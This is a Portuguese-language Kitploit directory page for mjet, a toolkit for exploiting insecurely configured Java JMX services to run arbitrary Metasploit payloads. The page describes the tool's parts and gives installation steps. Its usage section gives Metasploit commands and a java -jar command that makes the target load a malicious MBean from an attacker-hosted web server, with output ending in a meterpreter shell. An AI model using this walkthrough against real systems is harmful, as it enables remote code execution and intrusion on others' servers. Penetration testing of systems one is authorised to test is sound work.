Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mjet — Mogwai Toolkit de Exploração de Java Management Extensions (JMX) | Kitploit
Ferramentas/GitHubGitHub/mogwaisec/mjet
Frameworks de ExploraçãoGeração de PayloadsExploraçãoTestes de PenetraçãoConfiguração IncorretaRed Teaming
GitHubmogwaisec/mjet

mjet

Mogwai Toolkit de Exploração de Java Management Extensions (JMX)

Ver Repositório
17431há 10 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

mjet

Kit de exploração de extensões de gerenciamento Java (JMX) da Mogwai Security

mjet é uma ferramenta que pode ser usada para explorar serviços JMX configurados de forma insegura. Baseia-se no post do blog "Exploiting JMX-RMI" de Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" e pode ser usado para executar payloads arbitrários do Metasploit no sistema alvo.

O Mjet foi originalmente planejado para ser um kit de ataque completo, porém notamos que o repositório do Metasploit no Github contém um pull request que fornecerá suporte básico a RMI/serialização Java em ruby nativo. Isso é incrível e remove a dependência de Java. Então paramos de desenvolver esta ferramenta e criaremos módulos do Metasploit no futuro próximo.

mjet consiste nas seguintes partes:

  • Um módulo do Metasploit que emula um "servidor mlet". É basicamente um servidor web que hospeda um arquivo html que contém uma tag mlet
  • Um ManagedBean que é alterado pelo módulo do servidor mlet para incluir o payload selecionado
  • Um arquivo jar que é usado para contatar o serviço JMX inseguro.

Instalação (com a versão do Metasploit do github)

  • Copie a pasta "MBean" para "data/java/metasploit"
  • Copie java_mlet_server.rb para "modules/exploits/multi/misc/"

Uso

O exemplo usa os seguintes sistemas: atacante: 192.168.178.1 alvo: 192.168.178.200, serviço JMX executando na porta tcp 1616

  • Configure/inicie o módulo do Metasploit "java_mlet_server". O módulo será executado como um job em segundo plano
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Use o mjet.jar para conectar ao serviço JMX vulnerável e forneça a URL para o servidor web MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

e aproveite sua shell do meterpreter :-)

Baixar ferramenta